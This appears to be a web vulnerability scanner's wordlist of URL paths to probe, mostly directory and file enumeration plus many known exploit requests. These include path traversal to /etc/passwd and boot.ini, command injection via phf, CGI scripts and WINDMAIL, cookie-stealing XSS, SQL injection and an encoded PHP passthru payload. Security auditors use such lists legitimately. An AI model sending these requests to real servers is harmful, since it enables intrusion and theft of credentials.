+level/34/exec//show +level/35/exec//show +level/36/exec//show +level/37/exec//show +level/38/exec//show +level/39/exec//show +level/40/exec//show +level/41/exec//show +level/42/exec//show +level/43/exec//show +level/44/exec//show +level/45/exec//show +level/46/exec//show +level/47/exec//show +level/48/exec//show +level/49/exec//show +level/50/exec//show +level/51/exec//show +level/52/exec//show +level/53/exec//show +level/54/exec//show +level/55/exec//show +level/56/exec//show +level/57/exec//show +level/58/exec//show +level/59/exec//show +level/60/exec//show +level/61/exec//show +level/62/exec//show +level/63/exec//show +level/64/exec//show +level/65/exec//show +level/66/exec//show +level/67/exec//show +level/68/exec//show +level/69/exec//show +level/70/exec//show +level/71/exec//show +level/72/exec//show +level/73/exec//show +level/74/exec//show +level/75/exec//show +level/76/exec//show +level/77/exec//show +level/78/exec//show +level/79/exec//show +level/80/exec//show +level/81/exec//show +level/82/exec//show +level/83/exec//show +level/84/exec//show +level/85/exec//show +level/86/exec//show +level/87/exec//show +level/88/exec//show +level/89/exec//show +level/90/exec//show +level/91/exec//show +level/92/exec//show +level/93/exec//show +level/94/exec//show +level/95/exec//show +level/96/exec//show +level/97/exec//show +level/98/exec//show +level/99/exec//show +gallery/captionator.php +gallery/errors/configmode.php +gallery/errors/needinit.php +gallery/errors/reconfigure.php +gallery/errors/unconfigured.php +users.lst +WS_FTP.LOG +basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=sec&password=secu +examples/jsp/snp/snoop.jsp +nsn/env.bas +lcgi/lcgitest.nlm +com/ +com/novell/ +com/novell/webaccess +cgi-bin/ +index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc +index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd +cgi-bin/ccbill-local.pl?cmd=MENU +cgi-bin/ccbill-local.cgi?cmd=MENU +cgi-bin/mastergate/search.cgi?search=0&search_on=all +cgi-bin/Backup/add-passwd.cgi +cgi-bin/sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message +cgi-bin/gbook/gbook.cgi?_MAILTO=xx;ls +cgi-bin/bslist.cgi?email=x;ls +cgi-bin/bsguest.cgi?email=x;ls +cgi-bin/nbmember.cgi?cmd=list_all_users +/admin/admin.shtml +axis-cgi/buffer/command.cgi +support/messages +cgi-bin/where.pl?sd=ls%20/etc +cgi-bin/ +index.php?err=3&email=\"><script>alert(document.cookie)</script> +forgot_password.php?email=\"><script>alert(document.cookie)</script> +bugs/index.php?err=3&email=\"><script>alert(document.cookie)</script> +bugs/forgot_password.php?email=\"><script>alert(document.cookie)</script> +eventum/index.php?err=3&email=\"><script>alert(document.cookie)</script> +eventum/forgot_password.php?email=\"><script>alert(document.cookie)</script> +index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 +some.php?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 +some.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42 +some.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42 +index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 +viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 +NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 +NUKEindex.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 +NUKEviewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 +index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 +index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 +index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 +viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 +NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 +NUKEindex.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 +NUKEviewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 +index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 +cgi-bin/phf?Qname=root%0Acat%20/etc/passwd%20 +cgi-bin/phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd +cgi-bin/phf +cgi-bin/upload.cgi +upload.cgi+ +server-status +?PageServices +?wp-cs-dump +cfdocs.map +publisher/ +cgi-bin/nph-publish.cgi +cgi-bin/nph-test-cgi +cgi-bin/pfdisplay.cgi?../../../../../../etc/passwd +cgi-bin/pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|' +cgi-bin/pfdispaly.cgi?../../../../../../../../../../etc/passwd +cgi-bin/pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|' +counter/1/n/n/0/3/5/0/a/123.gif +iissamples/exair/search/search.asp +cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD +../webserver.ini + +na_admin/ + + +cpqlogin.htm +cpqlogin.htm + + + + + + + + + + + + + + + + + + + + +main_page.php + +cpanel/ +shopexd.asp?catalogid='42 +shopping/diag_dbtest.asp +_vti_bin/fpcount.exe/ +forum/index.php?method=<script>alert('Vulnerable')</script> +zorum/index.php?method=<script>alert('Vulnerable')</script> +wwwboard/passwd.txt +login/sm_login_screen.php?error=\"><script>alert('Vulnerable')</script> +login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')</script> +SPHERA/login/sm_login_screen.php?error=\"><script>alert('Vulnerable')</script> +SPHERA/login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')</script> +acart2_0/signin.asp?msg=<script>alert(\"test\")</script> +ows-bin/perlidlc.bat?&dir +photo/ +photodata/ +cgi-bin/photo/ +iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qfullhit.htw&CiRestriction=none&CiHiliteType=Full +iissamples/issamples/oop/qsumrhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qsumrhit.htw&CiRestriction=none&CiHiliteType=Full +null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full + +jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../boot.ini +jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../etc/passwd +cgi-bin/include/new-visitor.inc.php +%3f.jsp +%3f.jsp +msadc/msadcs.dll +./../../../../../../../../../etc/* +./../../../../../../../../../etc/passw* +bytehoard/index.php?infolder=../../../../../../../../../../../etc/ +Search +musicqueue.cgi +cgi-bin/musicqueue.cgi +scripts/tools/newdsn.exe +OpenFile.aspx?file=../../../../../../../../../../boot.ini +cgi-bin/windmail +cgi-bin/windmail.exe +cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini% +cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\ +index.php?vo=\"><script>alert(document.cookie);</script> +.../.../.../.../.../.../.../.../.../.../etc/passwd +cgi-bin/dose.pl?daily&somefile.txt&|ls| +admin/database/wwForum.mdb +../config.dat +iisadmpwd/aexp2.htr +iisadmpwd/aexp2b.htr +iisadmpwd/aexp3.htr +iisadmpwd/aexp4.htr +iisadmpwd/aexp4b.htr +/admin/aindex.htm +cgi-bin/gbadmin.cgi?action=change_adminpass +cgi-bin/gbadmin.cgi?action=change_automail +cgi-bin/gbadmin.cgi?action=colors +cgi-bin/gbadmin.cgi?action=setup +cgi-bin/gbpass.pl +shopping/shopdisplayproducts.asp?id=1&cat=<script>alert('test')</script> +hopdisplayproducts.asp?id=1&cat=<script>alert(document.cookie)</script> +admin/wg_user-info.ml +banners.php?op=EmailStats&cid=1%20AND%20passwd%20LIKE%20'a%'/* +c32web.exe/ChangeAdminPassword +showmail.pl +reademail.pl +showmail.pl?Folder=<script>alert(document.cookie)</script> +iissamples/exair/search/query.asp +index.php?showforum=1&prune_day=100&sort_by=Z-A&sort_key=[sqlgoeshere] +index.php?offset=[%20Problem%20Here%20] +buddies.blt +buddy.blt +buddylist.blt +cgi-sys/addalink.cgi +cgi-sys/cgiecho +cgi-sys/cgiemail +cgi-sys/countedit +cgi-sys/domainredirect.cgi +cgi-sys/entropybanner.cgi +cgi-sys/entropysearch.cgi +cgi-sys/FormMail-clone.cgi +cgi-sys/helpdesk.cgi +cgi-sys/mchat.cgi +cgi-sys/randhtml.cgi +cgi-sys/realhelpdesk.cgi +cgi-sys/realsignup.cgi +cgi-sys/scgiwrap +cgi-sys/signup.cgi +pdf/ +sqlnet.log +cgi-bin/GW5/GWWEB.EXE +.psql_history +acceso/ +access-log +access.log +access/ +access_log +acciones/ +account/ +accounting/ +activex/ +adm/ +admin.htm +admin.html +admin.php +admin.php3 +admin.shtml +admin/ +Administration/ +administration/ +administrator/ +Admin_files/ +advwebadmin/ +Agent/ +Agentes/ +agentes/ +Agents/ +analog/ +apache/ +app/ +applicattion/ +applicattions/ +apps/ +archivar/ +archive/ +archives/ +archivo/ +asp/ +Asp/ +atc/ +auth/ +awebvisit.stat +ayuda/ +backdoor/ +backup/ +bak/ +banca/ +banco/ +bank/ +bbv/ +bdata/ +bdatos/ +beta/ +bin/ +boot/ +buy/ +buynow/ +c/ +cache-stats/ +caja/ +card/ +cards/ +cart/ +cash/ +ccard/ +ccbill/secure/ccbill.log +cd/ +cdrom/ +cert/ +certificado/ +certificate +certificates +cfdocs/exampleapp/email/application.cfm +cfdocs/exampleapp/publish/admin/addcontent.cfm +cfdocs/exampleapp/publish/admin/application.cfm +cfdocs/examples/httpclient/mainframeset.cfm +cgi-bin/dbmlparser.exe +cgi-bin/icat +client/ +cliente/ +clientes/ +clients/ +cm/ +code/ +communicator/ +compra/ +compras/ +compressed/ +conecta/ +config/ +config/checks.txt +connect/ +console +correo/ +counter/ +credit/ +crypto/ +css +cuenta/ +cuentas/ +customers/ +dan_o.dat +dat/ +data/ +dato/ +datos/ +db/ +dbase/ +demo/ +demos/ +dev/ +devel/ +development/ +dir/ +directory/ +DMR/ +doc-html/ +down/ +download/ +downloads/ +easylog/easylog.html +ejemplo/ +ejemplos/ +employees/ +envia/ +enviamail/ +error_log +es/ +excel/ +Excel/ +EXE/ +exe/ +fbsd/ +file/ +fileadmin/ +files/ +forum/ +forums/ +foto/ +fotos/ +fpadmin/ +ftp/ +gfx/ +global/ +graphics/ +guest/ +guestbook/ +guests/ +hidden/ +hitmatic/ +hitmatic/analyse.cgi +hits.txt +hit_tracker/ +home/ +homepage/ +htdocs/ +html/ +htpasswd +HyperStat/stat_what.log +hyperstat/stat_what.log +ibill/ +idea/ +ideas/ +imagenes/ +img/ +imgs/ +import/ +impreso/ +includes/ +incoming/ +info/ +informacion/ +information/ +ingresa/ +ingreso/ +install/ +internal/ +intranet/ +invitado/ +invitados/ +java-plugin/ +java/ +jdbc/ +job/ +jrun/ +js +lib/ +library/ +libro/ +linux/ +log.htm +log.html +log.txt +logfile +logfile.htm +logfile.html +logfile.txt +logfile/ +logfiles/ +logger.html +logger/ +logging/ +login/ +logs.txt +logs/ +logs/access_log +logs/error_log +lost+found/ +mail/ +manage/cgi/cgiproc +marketing/ +master.password +mbox +members/ +message/ +messaging/ +ministats/admin.cgi +misc/ +mkstats/ +movimientos/ +mp3/ +mqseries/ +msql/ +msword/ +Msword/ +MSword/ +NetDynamic/ +NetDynamics/ +netscape/ +new +new/ +news +nl/ +noticias/ +odbc/ +officescan/cgi/jdkRqNotify.exe +old/ +oracle +oradata/ +order/ +orders/ +orders/checks.txt +orders/mountain.cfg +orders/orders.log +orders/orders.txt +outgoing/ +ows/ +pages/ +Pages/ +passwd +passwd.adjunct +passwd.txt +passwdfile +password +password/ +passwords.txt +passwords/ +PDG_Cart/ +people.list +perl5/ +php/ +phpmyadmin/ +phpMyAdmin/ +pics/ +piranha/secure/passwd.php3 +pix/ +poll +polls +porn/ +pr0n/ +privado/ +private/ +prod/ +pron/ +prueba/ +pruebas/ +pub/ +public/ +publica/ +publicar/ +publico/ +purchase/ +purchases/ +pw/ +pwd.db +python/ +readme +README.TXT +readme.txt +register/ +registered/ +reports/ +reseller/ +restricted/ +retail/ +reviews/newpro.cgi +root/ +sales/ +sample/ +samples/ +save/ +scr/ +scratch +scripts/weblog +search.vts +search97.vts +secret/ +secure/ +secured/ +sell/ +server_stats/ +service/ +services/ +servicio/ +servicios/ +setup/ +shop/ +shopper/ +software/ +solaris/ +source/ +Sources/ +spwd +sql/ +src/ +srchadm +ss.cfg +ssi/ +staff/ +stat.htm +stat/ +statistic/ +Statistics/ +statistics/ +stats.htm +stats.html +stats.txt +stats/ +Stats/ +status/ +store/ +StoreDB/ +stylesheet/ +stylesheets/ +subir/ +sun/ +super_stats/access_logs +super_stats/error_logs +support/ +swf +sys/ +system/ +tar/ +tarjetas/ +temp/ +template/ +temporal/ +test.htm +test.html +test.txt +test/ +testing/ +tests/ +tmp/ +tools/ +tpv/ +trabajo/ +trafficlog/ +transito/ +tree/ +trees/ +updates/ +user/ +users/ +users/scripts/submit.cgi +ustats/ +usuario/ +usuarios/ +vfs/ +w3perl/admin +warez/ +web/ +web800fo/ +webaccess.htm +webaccess/access-options.txt +webadmin/ +webboard/ +webcart-lite/ +webcart/ +webdata/ +weblog/ +weblogs/ +webmaster_logs/ +WebShop/ +WebShop/logs/cc.txt +WebShop/templates/cc.txt +website/ +webstats/ +WebTrend/ +Web_store/ +windows/ +word/ +work/ +wstats/ +wusage/ +www-sql/ +www/ +wwwboard/wwwboard.cgi +wwwboard/wwwboard.pl +wwwjoin/ +wwwlog/ +wwwstats.html +wwwstats/ +wwwthreads/3tvars.pm +wwwthreads/w3tvars.pm +zipfiles/ +_pages +cgi-bin/ +cgi-bin/.fhp +cgi-bin/add_ftp.cgi +cgi-bin/admin.cgi +cgi-bin/admin.php +cgi-bin/admin.php3 +cgi-bin/admin.pl +cgi-bin/adminhot.cgi +cgi-bin/adminwww.cgi +cgi-bin/AnyBoard.cgi +cgi-bin/AnyForm +cgi-bin/AnyForm2 +cgi-bin/ash +cgi-bin/ax-admin.cgi +cgi-bin/ax.cgi +cgi-bin/axs.cgi +cgi-bin/bash +cgi-bin/bnbform +cgi-bin/bnbform.cgi +cgi-bin/cart.pl +cgi-bin/cgimail.exe +cgi-bin/classifieds +cgi-bin/classifieds.cgi +cgi-bin/clickcount.pl?view=test +cgi-bin/code.php +cgi-bin/code.php3 +cgi-bin/count.cgi +cgi-bin/csh +cgi-bin/cstat.pl +cgi-bin/c_download.cgi +cgi-bin/dasp/fm_shell.asp +cgi-bin/day5datacopier.cgi +cgi-bin/dfire.cgi +cgi-bin/dig.cgi +cgi-bin/displayTC.pl +cgi-bin/edit.pl +cgi-bin/enter.cgi +cgi-bin/environ.cgi +cgi-bin/environ.pl +cgi-bin/ex-logger.pl +cgi-bin/excite +cgi-bin/filemail +cgi-bin/filemail.pl +cgi-bin/ftp.pl +cgi-bin/ftpsh +cgi-bin/getdoc.cgi +cgi-bin/glimpse +cgi-bin/hitview.cgi +cgi-bin/jailshell +cgi-bin/jj +cgi-bin/ksh +cgi-bin/log-reader.cgi +cgi-bin/log/ +cgi-bin/login.cgi +cgi-bin/login.pl +cgi-bin/logit.cgi +cgi-bin/logs.pl +cgi-bin/logs/ +cgi-bin/logs/access_log +cgi-bin/logs/error_log +cgi-bin/lookwho.cgi +cgi-bin/maillist.cgi +cgi-bin/maillist.pl +cgi-bin/man.sh +cgi-bin/meta.pl +cgi-bin/minimal.exe +cgi-bin/nlog-smb.cgi +cgi-bin/nlog-smb.pl +cgi-bin/noshell +cgi-bin/nph-publish +cgi-bin/ntitar.pl +cgi-bin/pass +cgi-bin/passwd +cgi-bin/passwd.txt +cgi-bin/password +cgi-bin/post_query +cgi-bin/pu3.pl +cgi-bin/ratlog.cgi +cgi-bin/responder.cgi +cgi-bin/rguest.exe +cgi-bin/rksh +cgi-bin/rsh +cgi-bin/search.cgi +cgi-bin/search.pl +cgi-bin/session/adminlogin +cgi-bin/sh +cgi-bin/show.pl +cgi-bin/stat/ +cgi-bin/stats-bin-p/reports/index.html +cgi-bin/stats.pl +cgi-bin/stats.prf +cgi-bin/stats/ +cgi-bin/statsconfig +cgi-bin/stats_old/ +cgi-bin/statview.pl +cgi-bin/survey +cgi-bin/survey.cgi +cgi-bin/tablebuild.pl +cgi-bin/tcsh +cgi-bin/test.cgi +cgi-bin/test/test.cgi +cgi-bin/textcounter.pl +cgi-bin/tidfinder.cgi +cgi-bin/tigvote.cgi +cgi-bin/tpgnrock +cgi-bin/ultraboard.cgi +cgi-bin/ultraboard.pl +cgi-bin/viewlogs.pl +cgi-bin/visitor.exe +cgi-bin/w3-msql +cgi-bin/w3-sql +cgi-bin/webais +cgi-bin/webbbs.cgi +cgi-bin/webbbs.exe +cgi-bin/webutil.pl +cgi-bin/webutils.pl +cgi-bin/webwho.pl +cgi-bin/wguest.exe +cgi-bin/www-sql +cgi-bin/wwwboard.cgi.cgi +cgi-bin/wwwboard.pl +cgi-bin/wwwstats.pl +cgi-bin/wwwthreads/3tvars.pm +cgi-bin/wwwthreads/w3tvars.pm +cgi-bin/zsh +adsamples/config/site.csc +advworks/equipment/catalog_type.asp +carbo.dll +clocktower/ +localstart.asp +market/ +mspress30/ +sam +sam.bin +sam._ +samples/search/queryhit.htm +scripts/counter.exe +scripts/cphost.dll +scripts/fpadmcgi.exe +scripts/postinfo.asp +scripts/samples/ctguestb.idc +scripts/samples/search/webhits.exe +site/iissamples/ +vc30/ +_mem_bin/ +_mem_bin/FormsLogin.asp +perl/files.pl +perl5/files.pl +scripts/convert.bas +owa_util%2esignature +cgi-dos/args.bat +custdata/ +hostingcontroller/ +data.sql +databases/ +databse.sql +db.sql +etc/passwd +img-sys/ +java-sys/ +javadoc/ +log/ +manager/ +manual/ +exchange/ +pls/admin +account.nsf +accounts.nsf +admin.nsf +admin4.nsf +admin5.nsf +agentrunner.nsf +alog.nsf +archive/a_domlog.nsf +archive/l_domlog.nsf +a_domlog.nsf +billing.nsf +bookmark.nsf +books.nsf +busytime.nsf +calendar.nsf +certa.nsf +certlog.nsf +certsrv.nsf +chatlog.nsf +clbusy.nsf +cldbdir.nsf +clusta4.nsf +collect4.nsf +cpa.nsf +customerdata.nsf +da.nsf +database.nsf +db.nsf +dclf.nsf +DEASAppDesign.nsf +DEASLog.nsf +DEASLog01.nsf +DEASLog02.nsf +DEASLog03.nsf +DEASLog04.nsf +DEASLog05.nsf +decsadm.nsf +decsdoc.nsf +decslog.nsf +DEESAdmin.nsf +default.nsf +dirassist.nsf +doladmin.nsf +dols_help.nsf +domadmin.nsf +domcfg.nsf +event.nsf +events.nsf +events5.nsf +group.nsf +groups.nsf +help5_admin.nsf +help5_client.nsf +help5_designer.nsf +homepage.nsf +iNotes/Forms5.nsf +iNotes/Forms5.nsf/$DefaultNav +jotter.nsf +kbccv11.nsf +kbnv11.nsf +kbssvv11.nsf +lcon.nsf +ldap.nsf +leiadm.nsf +leilog.nsf +leivlt.nsf +log4a.nsf +lsxlc.nsf +l_domlog.nsf +mab.nsf +mail/adminisist.nsf +mail1.box +mail10.box +mail2.box +mail3.box +mail4.box +mail5.box +mail6.box +mail7.box +mail8.box +mail9.box +mailw46.nsf +msdwda.nsf +mtatbls.nsf +mtdata/mtstore.nsf +mtstore.nsf +nntp/nd000000.nsf +nntp/nd000001.nsf +nntp/nd000002.nsf +nntp/nd000003.nsf +nntp/nd000004.nsf +nntppost.nsf +notes.nsf +ntsync4.nsf +ntsync45.nsf +perweb.nsf +private.nsf +public.nsf +qpadmin.nsf +quickplace/quickplace/main.nsf +quickstart/qstart50.nsf +quickstart/wwsample.nsf +readme.nsf +reports.nsf +sample/faqw46 +sample/framew46 +sample/pagesw46 +sample/siregw46 +sample/site1w4646 +sample/site2w4646 +sample/site3w4646 +schema50.nsf +secret.nsf +setupweb.nsf +smbcfg.nsf +smconf.nsf +smency.nsf +smmsg.nsf +smquar.nsf +smsolar.nsf +smtime.nsf +smtp.box +smtp.nsf +smtpibwq.nsf +smtpobwq.nsf +smtptbls.nsf +smvlog.nsf +software.nsf +srvnam.htm +statmail.nsf +stauths.nsf +stautht.nsf +stconf.nsf +stconfig.nsf +stdnaset.nsf +stdomino.nsf +stlog.nsf +streg.nsf +stsrc.nsf +test.nsf +today.nsf +userreg.nsf +users.nsf +vpuserinfo.nsf +web.nsf +webuser.nsf +welcome.nsf +wksinst.nsf +finance.xls +finances.xls +abonnement.asp +acartpath/signin.asp?|-|0|404_Object_Not_Found +add_acl +admbrowse.php?down=1&cur=%2Fetc%2F&dest=passwd&rid=1&S=[someid] +admin/auth.php +admin/cfg/configscreen.inc.php+ +admin/cfg/configsite.inc.php+ +admin/cfg/configsql.inc.php+ +admin/cfg/configtache.inc.php+ +admin/cms/htmltags.php +admin/credit_card_info.php +admin/exec.php3 +admin/index.php +admin/modules/cache.php+ +admin/objects.inc.php4 +admin/script.php +admin/settings.inc.php+ +admin/templates/header.php +admin/upload.php +admin_t/include/aff_liste_langue.php +adv/gm001-mc/ +aff_news.php +approval/ts_app.htm +archive.asp +archive_forum.asp +ashnews.php +auth.inc.php +b2-tools/gm-2-b2.php +bandwidth/index.cgi +basilix.php3 +bigsam_guestbook.php?displayBegin=9999...9999 +bin/common/user_update_passwd.pl +biztalktracking/RawCustomSearchField.asp?|-|0|404_Object_Not_Found +biztalktracking/rawdocdata.asp?|-|0|404_Object_Not_Found +board/index.php +board/philboard_admin.asp+ +boilerplate.asp?NFuse_Template=../../boot.ini&NFuse_CurrentFolder=/SSLx0020Directories|-|0|404_Object_Not_Found +bugtest+/+ +caupo/admin/admin_workspace.php +ccbill/whereami.cgi +chat_dir/register.php +checkout_payment.php +communique.asp +community/forumdisplay.php +community/index.php?analized=anything +community/member.php +compte.php +config/html/cnf_gi.htm +convert-date.php +cp/rac/nsManager.cgi +CSNews.cgi +csPassword.cgi?command=remove%20 +cutenews/comments.php +cutenews/search.php +cutenews/shownews.php +Data/settings.xml+ +database/metacart.mdb+ +db.php +dbabble +dcp/advertiser.php +defines.php +dltclnt.php +doc/admin/index.php +docs/NED +dotproject/modules/files/index_table.php +dotproject/modules/projects/addedit.php +dotproject/modules/projects/view.php +dotproject/modules/projects/vw_files.php +dotproject/modules/tasks/addedit.php +dotproject/modules/tasks/viewgantt.php +do_map +do_subscribe +email.php +emml_email_func.php +emumail.cgi?type=.%00 +entete.php +enteteacceuil.php +etc/shadow+ +eventcal2.php.php +ez2000/ezadmin.cgi +ez2000/ezboard.cgi +ez2000/ezman.cgi +faqman/index.php +filemanager/index.php3 +filemgmt/brokenfile.php +filemgmt/singlefile.php +filemgmt/viewcat.php +filemgmt/visit.php +foro/YaBB.pl +forum-ra.asp?n=....//....//....//....//....//....//....//etc.passwd +forum-ra.asp?n=../../../../../../../../../etc/passwd +forum-ra.asp?n=../../../../../../../../../etc/passwd%00 +forum-ra.asp?n=/../../../../../../../../../../../boot.ini +forum-ra.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini +forum-ra.asp?n=/etc/passwd +forum-ra.asp?n=/etc/passwd%00 +forum-ra.asp?n=c:\boot.ini +forum-ra_professionnel.asp?n=%60/etc/passwd%60 +forum-ra_professionnel.asp?n=../../../../../../../../../etc/passwd%00 +forum-ra_professionnel.asp?n=../../boot.ini +forum-ra_professionnel.asp?n=/....../boot.ini +forum-ra_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini +forum-ra_professionnel.asp?n=/../../../../../../etc/passwd +forum-ra_professionnel.asp?n=/../../../etc/passwd +forum-ra_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini +forum-ra_professionnel.asp?n=/etc/passwd +forum-ra_professionnel.asp?n=/etc/passwd%00 +forum-ra_professionnel.asp?n=c:\boot.ini +forum.asp?n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'. +forum.asp?n=../../../../../../../../../etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum.asp?n=../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum.asp?n=/....../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum.asp?n=/../../../../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum.asp?n=/../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum.asp?n=/etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum.asp?n=/etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum.asp?n=c:\boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'c:'. +forum/mainfile.php +forum/member.php +forum/newreply.php +forum/newthread.php +forum/viewtopic.php +forum1.asp?n=%60/etc/passwd%60&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record. +forum1.asp?n=....//....//....//....//....//....//....//etc.passwd&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record. +forum1.asp?n=../../../../../../../../../etc/passwd%00&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record. +forum1.asp?n=../../boot.ini&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record. +forum1.asp?n=/....../boot.ini&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record. +forum1.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_cu +forum1.asp?n=/../../../../../../etc/passwd&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record. +forum1.asp?n=/../../../etc/passwd&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record. +forum1.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record. +forum1.asp?n=/etc/passwd%00&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record. +forum1.asp?n=/etc/passwd&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record. +forum1.asp?n=1753&nn=%60/etc/passwd%60 +forum1.asp?n=1753&nn=....//....//....//....//....//....//....//etc.passwd +forum1.asp?n=1753&nn=../../../../../../../../../../etc/passwd +forum1.asp?n=1753&nn=../../../../../../../../../../etc/passwd%00 